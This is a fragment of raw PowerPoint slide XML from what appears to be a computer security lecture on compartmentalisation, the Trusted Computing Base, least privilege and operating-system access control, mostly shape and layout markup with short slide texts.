                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5865B02-C480-30F8-F035-51A252FA5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0" t="20293" r="-2" b="2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5034543" y="6167282"/>
              <a:ext cx="709688" cy="11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1281" name="Content Placeholder 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82AAD4DB-218B-A486-CC2F-9D417109E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0" t="20293" r="-2" b="2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6543564" y="6668108"/>
              <a:ext cx="709688" cy="11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1282" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41DA861D-6DA0-A48E-F2A2-8ECD7E5F69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343668" y="5439895"/>
              <a:ext cx="45719" cy="628099"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 166146 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 263048 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 415346 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 526120 h 5345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770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBez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83" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABAB06B-52F5-6074-8C9D-05E1E3EC5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184" y="5419578"/>
              <a:ext cx="98542" cy="1488142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 2147483646 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 2147483646 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 2147483646 h 5345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770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBez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84" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46362A4C-F206-055E-422E-846023A48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842495" y="6067993"/>
              <a:ext cx="55913" cy="520389"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 5623 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 8901 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 14055 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 17804 h 5345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770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBez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Trapezium 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C205E32A-9B48-5375-8167-BE749F341B7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4691063" y="4592638"/>
            <a:ext cx="2760662" cy="2487612"/>
          </a:xfrm>
          <a:prstGeom prst="trapezoid">
            <a:avLst>
              <a:gd name="adj" fmla="val 39849"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9966">
              <a:alpha val="20000"/>
            </a:srgb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Comic Sans MS" pitchFamily="64" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Afbeelding 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{392B0126-B951-88FC-FA5C-49E03F3B8C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5254625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E24F5FEE-3754-DB36-E57A-1F6474E94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Compartmentalisation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5DFAF6-E44F-8B3A-7350-42931057F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GB" dirty="0"/>
              <a:t>Important questions to ask about any form of compartmentalisation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the Trusted Computing Base (TCB) ?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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compartmentalising critical functionality inside a trusted process reduces the TCB for that functionality inside that process, but increases the TCB with the TCB of the enforcement mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can the compartmentalisation be controlled by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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800" dirty="0"/>
              <a:t>How expressive &amp; complex are these policies?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800" dirty="0"/>
              <a:t>Expressivity can be good, but resulting complexity can be bad…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input &amp; output channels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>?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800" dirty="0"/>
              <a:t>We want exposed interfaces to be as simple, small, and just powerful enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Are there  any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hidden channels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> timing behaviour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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These can be used deliberately, as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>covert channels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,                                                              or exist by accident, as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>side channels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3316" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D3021C-45B2-8DAF-4606-4A77019739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9B0307F4-D11C-4B56-BC39-8115A792F22A}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FE98BAA-4702-10B9-738D-4EA1E98AB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Access control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DB8EF-D596-25F6-BD95-2986A09C9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nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some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compartments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> offer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control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configured</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" i="1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dirty="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>involves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>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 err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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 err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> (eg. users, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>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 err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000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that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give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rights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to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parties</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>specifying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rgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>who is allowed to do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0099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>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Runtime monitoring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,                                                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>becomes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> TCB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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill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rgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill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15364" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00E1CEB6-3650-CCED-F5F9-DE67406B8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D88CAD84-C52D-4ED6-AACF-A2BB08021BAD}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-N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945B9BC8-9361-AC30-A9E8-3F75B43F1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Compartmentalisation for security design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256DD5-666F-01D3-ECCB-078566F9E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GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Divide systems into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – aka compartments, components,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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</a:rPr>
              <a:t>    Different compartments for different tasks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GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Give</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> minimal access rights </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to each compartment   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>principle of least privilege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GB" dirty="0"/>
              <a:t>Have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strong encapsulation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>between compartments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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GB" sz="1800" dirty="0"/>
              <a:t>     so flaw in one compartment cannot corrupt others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GB" dirty="0"/>
              <a:t>Have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clear and simple interfaces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>between compartments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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GB" sz="1800" dirty="0"/>
              <a:t>     exposing minimal functionality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dirty="0"/>
              <a:t>Benefits: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eriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduces TCB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>for certain security-sensitive functionality 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eriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduces the impact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>of any security flaws.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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5B1D91-2A07-6473-948E-69F851AB3F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9778EB39-2FC7-4648-9D63-9CD2132B8A4F}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43ABFFC0-2FB2-1CBA-F1B3-FB73D0E9CB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en-US"/>
              <a:t>Operating System (OS) Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487B876A-555B-82C8-9573-6B179949DF5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400"/>
              <a:t>See also Chapter 2 of the lecture notes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21E10D0-094A-807F-893E-F764E86561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F288CBAA-F45D-41A6-BC83-8572CEA5E757}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-N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8E1F989-A99A-B7AB-5F44-B077A4F6A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nl-NL"/>
              <a:t>Classical OS-based security (reminder)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18435" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D008F7AB-A0ED-3B2C-A697-351BE68D4A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7513" y="5546725"/>
            <a:ext cx="1130300" cy="846138"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FD83A1-7C72-8005-7D6B-5129E7457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43B1561-C9D3-49AB-853A-2DE0279DA8F9}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18437" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE484B9F-BE69-CFF2-5442-32473C16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22" b="40233"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4095750" y="5597525"/>
            <a:ext cx="2232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8" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E15380AA-85F3-19CE-6A48-D1996B741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4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6386513" y="5456238"/>
            <a:ext cx="134937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9" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4635663F-A6D7-78B6-11F2-19069309B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408613"/>
            <a:ext cx="957263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40" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C750A5E-654A-EB9B-A94F-6AEE501DC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370013"/>
            <a:ext cx="665162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41" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59184102-D34B-02F8-F322-A5656560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2865438"/>
            <a:ext cx="738187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42" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF64E9A-F921-C384-4D20-994155412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4614863"/>
            <a:ext cx="6364288" cy="709612"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 222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2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (CPU, memory, I/O peripherals)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
